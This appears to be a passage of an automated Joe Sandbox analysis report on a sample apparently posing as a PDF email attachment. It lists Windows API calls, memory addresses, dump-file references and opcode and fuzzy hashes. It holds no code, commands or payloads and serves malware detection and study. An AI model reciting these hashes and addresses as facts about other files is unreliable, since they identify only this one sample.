                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 007CDA07
                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007CDA21
                                                                                                            • Part of subcall function 00755A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7896,?,?,00000000), ref: 00755A2C
                                                                                                            • Part of subcall function 00755A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7896,?,?,00000000,?,?), ref: 00755A50
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 327935632-0
                                                                                                          APIs
                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007BE61F
                                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 007BE648
                                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007BE687
                                                                                                            • Part of subcall function 00759837: __itow.LIBCMT ref: 00759862
                                                                                                            • Part of subcall function 00759837: __swprintf.LIBCMT ref: 007598AC
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007BE6AC
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007BE6B4
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1389676194-0
                                                                                                          APIs
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A63E7
                                                                                                          • TranslateAcceleratorW.USER32(?,?,?), ref: 007A6433
                                                                                                          • TranslateMessage.USER32(?), ref: 007A645C
                                                                                                          • DispatchMessageW.USER32(?), ref: 007A6466
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A6475
                                                                                                          Similarity
                                                                                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                          • String ID:
                                                                                                          • API String ID: 2108273632-0
                                                                                                          • Opcode ID: cc3973acdb2ca4a5b4e6550e29a2394e1c01aade711c9bb2c0ee6147939f816f
                                                                                                          • Instruction ID: 6bea41e5a2e7cba5863630fdf7532b4b54adef0fc904e105858658b23237f79d
                                                                                                          • Opcode Fuzzy Hash: cc3973acdb2ca4a5b4e6550e29a2394e1c01aade711c9bb2c0ee6147939f816f
                                                                                                          • Instruction Fuzzy Hash: DB31C471901686EFDB648FB0DC44BF67BACBF86300F188265E525C21A0E73D9589D760
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 007A8A30
                                                                                                          • PostMessageW.USER32(?,00000201,00000001), ref: 007A8ADA
                                                                                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007A8AE2
                                                                                                          • PostMessageW.USER32(?,00000202,00000000), ref: 007A8AF0
                                                                                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007A8AF8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3382505437-0
                                                                                                          • Opcode ID: 578fc7e1048e0022a4909809315b610002f3026e4e340cf0d72d9b58489796de
                                                                                                          • Instruction ID: 5977b41e14e0303081878da696662bffb66175c0f09198aa019e2db8e0a62950
                                                                                                          • Opcode Fuzzy Hash: 578fc7e1048e0022a4909809315b610002f3026e4e340cf0d72d9b58489796de
                                                                                                          • Instruction Fuzzy Hash: 6D31EE71500219EBDF14CFA8DD4CA9E3BB5EB45315F10822AF925EA2D0C7B89D10CB91
                                                                                                          APIs
                                                                                                          • IsWindowVisible.USER32(?), ref: 007AB204
                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007AB221
                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007AB259
                                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007AB27F
                                                                                                          • _wcsstr.LIBCMT ref: 007AB289
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                          • String ID:
                                                                                                          • API String ID: 3902887630-0
                                                                                                          • Opcode ID: 8a5e9a9692b17d0d42e58cec4d85692802dd40d8231081bd5d55f9fe83d46466
                                                                                                          • Instruction ID: f3ce67dc8c961623017327c6e644b39ef95d1124dbfe450118f3f653628c5d6e
                                                                                                          • Opcode Fuzzy Hash: 8a5e9a9692b17d0d42e58cec4d85692802dd40d8231081bd5d55f9fe83d46466
                                                                                                          • Instruction Fuzzy Hash: 0321CB71205204BAEB155B759C49F7F7BA8EF86750F00813EF809D9192EB69DC419690
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007DB192
                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007DB1B7
                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007DB1CF
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 007DB1F8
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007C0E90,00000000), ref: 007DB216
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long$MetricsSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 2294984445-0
                                                                                                          • Opcode ID: 85270c415a424cfb5e45690e2ba7bde29ea146a69c2ea34b5bfa84874d049666
                                                                                                          • Instruction ID: c21198af24b5283cb25f5751c9f4857b4de6ec18330bcbebd27e554b678b0f5d
                                                                                                          • Opcode Fuzzy Hash: 85270c415a424cfb5e45690e2ba7bde29ea146a69c2ea34b5bfa84874d049666
                                                                                                          • Instruction Fuzzy Hash: BD219F72A10655EFCB109F38DC44A6A3BB4FB05361F16873AF932D72E0E73598208B90
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007A9320
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007A9352
                                                                                                          • __itow.LIBCMT ref: 007A936A
                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007A9392
                                                                                                          • __itow.LIBCMT ref: 007A93A3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$__itow$_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2983881199-0
                                                                                                          • Opcode ID: bbc2bf50d047e0745a199f6d65df13c43971609c1746f968eb2ec8e27235d532
                                                                                                          • Instruction ID: 6579e4fd8abe90258f8f7c9fd7ceab0ea61e600ebe33f7dd96fa45c2215c0a6c
                                                                                                          • Opcode Fuzzy Hash: bbc2bf50d047e0745a199f6d65df13c43971609c1746f968eb2ec8e27235d532
                                                                                                          • Instruction Fuzzy Hash: 8E210A31701204EBDF109A609C89EEE7BBCEB8A711F048025FE05D71C0D6B8CD559791
                                                                                                          APIs
                                                                                                          • IsWindow.USER32(00000000), ref: 007C5A6E
                                                                                                          • GetForegroundWindow.USER32 ref: 007C5A85
                                                                                                          • GetDC.USER32(00000000), ref: 007C5AC1
                                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 007C5ACD
                                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 007C5B08
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 4156661090-0
                                                                                                          • Opcode ID: 74d4b5fd75fd352008dcb2a58461d5799f3a9a357d78b4382bb1264a3cb34cb1
                                                                                                          • Instruction ID: 6041757b90674482cd7c25600aa932226b720b92ff31cc63d6c10f60af4c395b
                                                                                                          • Opcode Fuzzy Hash: 74d4b5fd75fd352008dcb2a58461d5799f3a9a357d78b4382bb1264a3cb34cb1
                                                                                                          • Instruction Fuzzy Hash: 4B218075A01104EFD700EF65DC88A9ABBF5EF48310F14C07DE80A97752CA78AD41CB50
                                                                                                          APIs
                                                                                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0075134D
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0075135C
                                                                                                          • BeginPath.GDI32(?), ref: 00751373
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 0075139C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                                          • String ID:
                                                                                                          • API String ID: 3225163088-0
                                                                                                          • Opcode ID: f17b0a98cac0bc126968a0feb2c3da34e5d894ea0d61a8c4202c8d07af5e4ddc
                                                                                                          • Instruction ID: 12664f8dc6f5c25664ab49c3accd91653164abb3d83cec897277d802cd16f822
                                                                                                          • Opcode Fuzzy Hash: f17b0a98cac0bc126968a0feb2c3da34e5d894ea0d61a8c4202c8d07af5e4ddc
                                                                                                          • Instruction Fuzzy Hash: E9213D30801608EFDB119F29EC487EA7BB9FB40723F58C226F811965B0D7B99995DF90
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 007B4ABA
                                                                                                          • __beginthreadex.LIBCMT ref: 007B4AD8
                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 007B4AED
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 007B4B03
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007B4B0A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                          • String ID:
                                                                                                          • API String ID: 3824534824-0
                                                                                                          • Opcode ID: a7fb3c266add57748b737d971c2d52c96b9b2c686fe3fa699553756c138329a5
                                                                                                          • Instruction ID: 78b65ba9d4b9b839d8d789ddd8c85dc2c14511e3e076d4969ef97a06b28ffc77
                                                                                                          • Opcode Fuzzy Hash: a7fb3c266add57748b737d971c2d52c96b9b2c686fe3fa699553756c138329a5
                                                                                                          • Instruction Fuzzy Hash: 621108B6905248FFCB009FA89C08BDB7FBCEF85320F188266F915D3251D679C90087A0
                                                                                                          APIs
                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A821E
                                                                                                          • GetLastError.KERNEL32(?,007A7CE2,?,?,?), ref: 007A8228
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,007A7CE2,?,?,?), ref: 007A8237
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,007A7CE2,?,?,?), ref: 007A823E
                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007A8255
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                           • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                           • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 842720411-0
                                                                                                          • Opcode ID: b1b23c8b84d4aabcd2372918aa69ffd44ebc693a37a32c2e204188b90ab6fbfd
                                                                                                          • Instruction ID: 3597f07d47fdbb47d564ffbcb60ee91255dd3154c1cf913c1e781943bbea676d
                                                                                                          • Opcode Fuzzy Hash: b1b23c8b84d4aabcd2372918aa69ffd44ebc693a37a32c2e204188b90ab6fbfd
                                                                                                          • Instruction Fuzzy Hash: 9F016D71201208FFDB204FA5DC48D6B7FBCFF8A754B50453AF84AC2260DA368D00CA61
                                                                                                          APIs
                                                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?,?,?,007A7455), ref: 007A7127
                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?,?), ref: 007A7142
                                                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?,?), ref: 007A7150
                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?), ref: 007A7160
                                                                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,007A7044,80070057,?,?), ref: 007A716C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 3897988419-0
                                                                                                          • Opcode ID: 8e2733e7d3bfbba8d71c29c832468dfc3680dcc81aae59badff29f10facab42e
                                                                                                          • Instruction ID: eedfbad24249c9c6a9a91d767f3a41899ecc529e60420d5b5dcf451989763d74
                                                                                                          • Opcode Fuzzy Hash: 8e2733e7d3bfbba8d71c29c832468dfc3680dcc81aae59badff29f10facab42e
                                                                                                          • Instruction Fuzzy Hash: 8A017C72602208ABDB154F64DC44AAA7BFDEB857A1F148265FD05D6220D739DD40EBA0
                                                                                                          APIs
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B5260
                                                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007B526E
                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B5276
                                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007B5280
                                                                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007B52BC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                          • String ID:
                                                                                                          • API String ID: 2833360925-0
                                                                                                          • Opcode ID: 224105c969dd5aa1f4d3912ef84ab103718ee1f544a288f9dbd73b13fa14e178
                                                                                                          • Instruction ID: 6d2335cc48a15e2b18c6306372976439dd1632aed4d15b1b9998eb0f3a497af8
                                                                                                          • Opcode Fuzzy Hash: 224105c969dd5aa1f4d3912ef84ab103718ee1f544a288f9dbd73b13fa14e178
                                                                                                          • Instruction Fuzzy Hash: F3015771D02A1DDBCF00EFE8E848BEDBB78FB0D311F404056E942B2240CB39595087A5
                                                                                                          APIs
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007A8121
                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007A812B
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A813A
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8141
                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8157
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 44706859-0
                                                                                                          • Opcode ID: 5d4b9ec31aa8de7e9cceaf0f29e765d6a06d51787b357b5ca3da98e85298f33c
                                                                                                          • Instruction ID: 3d734d3de04cbb223e6eea0dbc497c9e497c5e76f2bbd3af3caf2a18907ec0b5
                                                                                                          • Opcode Fuzzy Hash: 5d4b9ec31aa8de7e9cceaf0f29e765d6a06d51787b357b5ca3da98e85298f33c
                                                                                                          • Instruction Fuzzy Hash: E9F06271301308AFEB511FA5EC88E673BBCFF8A754B04413AF986C7150DB699D41DA62
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 007AC1F7
                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 007AC20E
                                                                                                          • MessageBeep.USER32(00000000), ref: 007AC226
                                                                                                          • KillTimer.USER32(?,0000040A), ref: 007AC242
                                                                                                          • EndDialog.USER32(?,00000001), ref: 007AC25C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3741023627-0
                                                                                                          • Opcode ID: 313d90c0a876ecbc2273eace784d0ecf91aee01981d03d223760070c7bb9649e
                                                                                                          • Instruction ID: b8ae14d5e98134caefba39a9037c908dcb6e08fb8309516b0a9c06798ecec65a
                                                                                                          • Opcode Fuzzy Hash: 313d90c0a876ecbc2273eace784d0ecf91aee01981d03d223760070c7bb9649e
                                                                                                          • Instruction Fuzzy Hash: E601A230404704ABEB215B60ED4EB9677B8FB01B06F00426AE553A14E0DBE8A9448B94
                                                                                                          APIs
                                                                                                          • EndPath.GDI32(?), ref: 007513BF
                                                                                                          • StrokeAndFillPath.GDI32(?,?,0078B888,00000000,?), ref: 007513DB
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 007513EE
                                                                                                          • DeleteObject.GDI32 ref: 00751401
                                                                                                          • StrokePath.GDI32(?), ref: 0075141C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                          • String ID:
                                                                                                          • API String ID: 2625713937-0
                                                                                                          • Opcode ID: 11c96d911156a2171c67170845fdc6494b65722903149a61f5eaa28c034b69d2
                                                                                                          • Instruction ID: e6d160428d5a411e585dc1521421c28d5df7c99458de8c27c9246807a9b31c8a
                                                                                                          • Opcode Fuzzy Hash: 11c96d911156a2171c67170845fdc6494b65722903149a61f5eaa28c034b69d2
                                                                                                          • Instruction Fuzzy Hash: E4F0C430005A48EBDB115F2AEC4C7993BB9BB41327F58C236E82A894F1C7798999DF54
                                                                                                          APIs
                                                                                                          • CoInitialize.OLE32(00000000), ref: 007BC432
                                                                                                          • CoCreateInstance.OLE32(007E2D6C,00000000,00000001,007E2BDC,?), ref: 007BC44A
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          • CoUninitialize.OLE32 ref: 007BC6B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmp
